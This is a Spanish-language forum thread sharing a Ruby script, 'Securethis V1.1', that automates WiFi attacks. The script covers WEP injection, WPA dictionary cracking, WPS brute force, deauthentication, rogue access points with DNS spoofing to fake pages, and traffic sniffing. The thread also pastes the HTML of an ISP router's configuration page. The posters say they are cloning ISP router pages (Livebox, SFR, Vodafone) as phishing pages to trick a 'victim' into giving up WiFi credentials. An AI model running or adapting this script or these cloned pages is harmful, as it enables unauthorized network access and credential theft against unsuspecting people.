0 Usuarios y 1 Visitante están viendo este tema.
#!/usr/bin/env ruby# encoding: utf-8require "rubygems"require "highline/import"puts "Make a good choice with airodump and press ctrl+c for next step"sleep 10system ("airmon-ng start wlan0")sleep 5system ("airodump-ng mon0")def wepinjsystem ("ifconfig") puts "Now choose your MAC adress and press enter, warning to write as well the adress!"mac=""mac=gets.chomp$mac=macputs "Le scan de reseau va se lancer, choisissez votre reseau et appuyez sur ctrl+c pour continuer"sleep 5system ("airodump-ng --encrypt wep --ignore-negative-one mon0") puts "Rentrez un nom pour le fichier de capture"nom=""nom=gets.chomp$nom=nom puts "Rentrez le nom du reseau (ESSID)"essid=""essid=gets.chomp$essid=essid puts "Rentrez le canal du reseau (CH)"ch=""ch=gets.chomp$ch=ch puts "Rentrez l'adresse du reseau (BSSID)"bssid=""bssid=gets.chomp$bssid=bssidsystem ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} --ignore-negative-one mon0 &> /dev/null &")sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} --ignore-negative-one mon0 &> /dev/null &")sleep 5system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} --ignore-negative-one mon0 &> /dev/null &")sleep 1800system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")enddef weppsystem ("ifconfig") puts "Now choose your MAC adress and press enter, warning to write as well the adress!"mac=""mac=gets.chomp$mac=macputs "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"sleep 5system ("airodump-ng --encrypt wep --ignore-negative-one mon0") puts "Rentrez un nom pour le fichier de capture"nom=""nom=gets.chomp$nom=nom puts "Rentrez le nom du reseau (ESSID)"essid=""essid=gets.chomp$essid=essid puts "Rentrez le canal du reseau (CH)"ch=""ch=gets.chomp$ch=ch puts "Rentrez l'adresse du reseau (BSSID)"bssid=""bssid=gets.chomp$bssid=bssidsystem ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} --ignore-negative-one mon0 &> /dev/null &")sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} --ignore-negative-one mon0 &> /dev/null &")sleep 5system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} --ignore-negative-one mon0 &> /dev/null &")sleep 1800system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")enddef wpadico puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"sleep 5system ("airodump-ng --encrypt wpa --ignore-negative-one mon0") puts "Rentrez un nom pour le fichier de capture"nom=""nom=gets.chomp$nom=nom puts "Rentrez le nom du reseau (ESSID)"essid=""essid=gets.chomp$essid=essid puts "Rentrez le canal du reseau (CH)"ch=""ch=gets.chomp$ch=ch puts "Rentrez l'adresse du reseau (BSSID)"bssid=""bssid=gets.chomp$bssid=bssid puts "Rentrez l'adresse de la personne connecte au reseau (STATION)"station=""station=gets.chomp$station=stationsystem ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} --ignore-negative-one mon0 &> /dev/null &")sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -0 150 -a #{$bssid} -c #{$station} --ignore-negative-one mon0 &> /dev/null &")sleep 148puts "Entrez le nom du dico a utiliser"dico=""dico=gets.chomp$dico=dicosystem ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -w #{$dico} #{$nom}.cap &> /dev/null &")enddef wparlocal puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"sleep 5system ("airodump-ng --encrypt wpa --ignore-negative-one mon0") puts "Rentrez le nom du reseau (ESSID)"essid=""essid=gets.chomp$essid=essid puts "Rentrez le canal du reseau (CH)"ch=""ch=gets.chomp$ch=ch puts "Creation de la rogue AP"sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")sleep 3`ifconfig at0 up``ifconfig at0 10.0.0.1 netmask 255.255.255.0``ifconfig at0 mtu 1400``echo > dhcpd.leases``iptables --flush``iptables --table nat --flush``iptables --delete-chain``iptables --table nat --delete-chain``route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null``iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1``iptables -P FORWARD ACCEPT``iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80` puts "Regles iptables effectues, redemarrage de dhcp3"sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &") puts "Mise en place de apache et dnsspoof"sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &") puts "lancement de wireshark, ITS NOT NECESSARY close it if you have a php script in your fake page"sleep 6system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")enddef wparinternet puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"sleep 5system ("airodump-ng --encrypt wpa --ignore-negative-one mon0") puts "Rentrez le nom du reseau (ESSID)"essid=""essid=gets.chomp$essid=essid puts "Rentrez le canal du reseau (CH)"ch=""ch=gets.chomp$ch=ch puts "Creation de la rogue AP"sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")sleep 3`ifconfig at0 up``ifconfig at0 10.0.0.1 netmask 255.255.255.0``ifconfig at0 mtu 1400``echo > dhcpd.leases``iptables --flush``iptables --table nat --flush``iptables --delete-chain``iptables --table nat --delete-chain``iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE` puts "Regles iptables effectues, redemarrage de dhcp3"sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &") puts "Mise en place de apache et dnsspoof"sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")sleep 3puts "lancement de wireshark, ITS NOT NECESSARY close it if you have a php script in your fake page"sleep 6system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")enddef wpsputs("Reaver with ten seconds between two request on the acces point.WARNING if reaver is not installed yet in the system you have to go here: http://www.linuxtrack.com/t1427-Installer-Reaver-sur-Ubuntu.htm and follow the instructions")sleep 20 puts "Rentrez l'adresse du reseau (BSSID)"bssid=""bssid=gets.chomp$bssid=bssidsystem ("xterm -hold -bg '#000000' -fg '#3A94FF' -e reaver -i mon0 #{$bssid} -d 10 -vv &> /dev/null &")enddef sergioputs("MAKE SURE THE FORWADING IS ENABLED (echo 1 > /proc/sys/net/ipv4/ip_forward) Sergio is a powerful proxy open source and easy to use for capture any traffic in the web! for more information and download go to https://code.google.com/p/sergio-proxy/ special thanks to Antares145 and his tuto, can be found here: http://antaresnotebook.wordpress.com/2013/03/31/tuto-rogue-ap-episode-2-sniffing-de-base-et-un-peu-de-fun/")sleep 40system ("ifconfig") puts "Enter your ip adress"ip=""ip=gets.chompip=ip`iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to #{$ip}:10000`Dir.chdir '/root/sergio/sergio-proxy'system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e ./sergio-proxy.py -l 10000 -w /tmp/log.txt &> /dev/null &")enddef hostapd puts("Hostapd access point mode, good to do a MITM more discreet (make sure your hostapd.conf has got a good configuration and the way to the folder is correct. to begin, remove the line driver=hostapd and replace it with driver=nl80211)")system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e hostapd /etc/hostapd/hostapd.conf &> /dev/null &")enddef deauth system ("ifconfig") puts("choose your network card to do the deauth (press enter if you want to use the same card as the rogue AP)")carte=""carte=gets.chomp$carte=cartesystem ("airmon-ng start #{$carte}")sleep 6system ("airodump-ng --encrypt wpa --ignore-negative-one mon0")puts("enter the channel of the target network (CH)")canal=""canal=gets.chomp$canal=canalputs("enter the adress of the target network (BSSID)")bssid=""bssid=gets.chomp$bssid=bssidputs("enter the name of the file capture in airodump")name=""name=gets.chomp$name=namesystem("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng --#{$canal} --#{$essid} --output-format csv -w #{$name} mon0 &> /dev/null &")sleep 5system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airdrop-ng -i mon0 -t #{$name}.csv -r /root/rules.txt -b -p &> /dev/null &")enddef planque puts "Airbase can find a hidden network too, you have to wait a little and the network will appear in your airodump-ng windows"sleep 15system("airodump-ng --encrypt wpa mon0")puts "Select the channel of the target network (CH)"ch=""ch=gets.chomp$ch=ch puts "Select the bssid of the target network (BSSID)"bssid=""bssid=gets.chomp$bssid=bssidsystem("airodump-ng -c #{$ch} --bssid #{$bssid} mon0") puts "Rogue access point with parameters of the hidden network is in active mode, see airodump and wait for the name of this network"sleep 10system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -a #{$bssid} -X mon0 &> /dev/null &")enddef metasploit puts "BEFORE Lauching metasploit if you are on unbutu or other linux plateform make sure you have all the librairies to run properly metasploit.Lauching msfconsole, this could take a time...wait.Come back to Securethis menu pressing exit in msfconsole"sleep 20system("msfconsole")enddef clean puts "Remove your index.html and php and all css present into /var/www and replace with the new files you choose CTRL+C TO ABORT NOW!"sleep 20`rm /var/www/index.php``rm /var/www/index.html``rm /var/www/valid.php``rm /var/www/*.css``rm /var/www/*.jpg``rm /var/www/*.ico`puts "Now enter the name of your folder wich countain the fakes pages"name=""name=gets.chomp$name=nameDir.chdir '/root'`cp -rv #{$name} /var/www`enddef settings puts "CHECK and EDIT: Important file needed for a good crack"sleep 10`gedit /etc/dhcp3/dhcpd.conf``gedit /root/dns.txt``gedit /etc/hostapd/hostapd.conf``gedit /root/rules.txt``gedit /var/log/apache2/access.log``gedit /var/log/apache2/error.log`endbegin puts loop do choose do |menu| menu.prompt = "Please select option" puts "################## Coded By Flow (Koala) #################" puts "################## Securethis V1.1 #################" puts " ######################### " puts " ############# " puts " ##### " puts " # " puts "~~~Does your network is secure?~~~ " menu.choice(:Wepinjection, "injection.") { wepinj() } menu.choice(:Wepp0841, "-p0841.") { wepp() } menu.choice(:Wpabruteforce, "attaque de bruteforce.") { wpadico() } menu.choice(:RogueAPlocal, "Rogue sin internet.") { wparlocal() } menu.choice(:RogueAPinternet, "Rogue con internet.") { wparinternet() } menu.choice(:ReaverWPS, "Reaver.") { wps() } menu.choice(:Sniffing, "Usando de Sergio proxy.") { sergio() } menu.choice(:Hostapd, "Hostapd.") { hostapd() } menu.choice(:DeauthAttack, "airdrop-ng.") { deauth() } menu.choice(:HiddenNetwork, "red escondido.") { planque() } menu.choice(:Metasploit, "lancamiento de msfconsole.") { metasploit() } menu.choice(:CleanApache2WARNING, "Limpiar su apache") { clean() } menu.choice(:Settings, "Caja de outilla.") { settings() } menu.choice(:Quit, "Quitter le prog.") { exit } end endend
y la difunta ( o sigue viva ? ) Tele2
Tele2 pertenece ahora a Vodafone
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Inicio</title><link rel="stylesheet" type="text/css" title="Style" href="../css/main.css" /><script type="text/javascript" src="../js/main.js"></script><script type="text/javascript" src="../js/utils.js"></script><script type="text/javascript" src="../js/menu.js"></script><script type="text/javascript">if(window.navigator.userAgent.indexOf("MSIE")>=1){document.execCommand("BackgroundImageCache", false, true);}</script></head><body id="top"><div id="global"> <div id="header"> <div class="logo"> <div class="logo_home"><a href="index.htm" ><img src="../img/header/logo.gif" border="0" alt="home" /></a></div> <div class="language"><strong><a href="../en_US/index.htm" id = "langlink" onclick = "changelang(0, 0);">English</a> | Español</strong></div> </div> </div> <div id="container"> <div id="nav"> <script type="text/javascript">ImportMenu_es('');</script> </div> <div id="content" class="home"> <div class="content_bl"> <div class="content_tl"> <div class="content_tr"> <div class="content_cnr"> <div class="content_main"> <div class="intro"> <p class="intro">Bienvenido la <span class="title">interfaz de configuración</span></p> <p>El Equipo está configurado para proporcionar un rendimiento y una seguridad óptimos.<br />También puede conectar al Equipo diversos accesorios, que se podrán compartir entre<br />varios ordenadores y tendrán acceso a Internet. </p> </div> <table class="line std_Vmargin"> <tr> <td class="txt_l"> <div class="box size_Home_1on3" style="background:none; border:1px solid #CCCCCC;"> <div class=""><div class=""><div class=""><div class=""> <h3 class="box_hd box_item" ><span>Equipo</span></h3> <div class="box_main"> <img src="../img/pictures/home_configurationbox.jpg" alt="Box configuration " /> <ul class="link_list"> <li><a href="statut_services.html">Estado del servicio: comprobar el estado de los servicios (conexión a Internet, WiFi, telefonía fija )</a></li> <li><a href="config_appli.html">Aplicaciones: autorizar a mis juegos y aplicaciones para que funcionen en la red</a></li> <script type="text/javascript"> <!-- var pwdLevel = '<%ejGet(userLevel)%>'; if ( pwdLevel != '1' ) { document.writeln('<li><a href="config_wifi.html">WiFi: administrar mi conexión inalámbrica </a></li>'); } --> </script> <li class="last"><a href="config_routeur_expert.htm">Router: administrar parámetros avanzados del Equipo </a></li> </ul> </div> </div></div></div></div> </div> </td> <td class="txt_c"> <div class="box size_Home_1on3 middle" style="background:none; border:1px solid #CCCCCC;"> <div class=""><div class=""><div class=""><div class=""> <h3 class="box_hd homenetwork_item"><span>Red local</span></h3> <div class="box_main"> <img src="../img/pictures/home_accessoiresbox.jpg" alt="Home Network" /> <ul class="link_list"> <li><a href="equipements_raccordes.html">Dispositivos conectados: ver los dispositivos conectados al Equipo</a></li> </ul> </div> </div></div></div></div> </div> </td> <td class="txt_r"> <div class="box size_Home_1on3 floatr" style="background:none; border:1px solid #CCCCCC;"> <div class=""><div class=""><div class=""><div class=""> <h3 class="box_hd support_item" ><span>Soporte técnico</span></h3> <div class="box_main"> <img src="../img/pictures/home_assistance.jpg" alt="Support" /> <ul class="link_list"> <li><a href="diagnostic.html">Solución de problemas: acceso a la solución de problemas relacionados con el equipo de manera integral.</a></li> </ul> </div> </div></div></div></div> </div> </td> </tr> </table> </div> </div> </div> </div> </div> </div> <div class="clearing"></div> </div></div></body></html>
Si puedes hacer un dump de vodafone para mi (los CSS y JS del codigo de la pagina wifi)
He hecho Livebox y Sfr hoy y voy a intentar de poner una shoutbox para la ayuda a la victima en todas la paginas clonadas.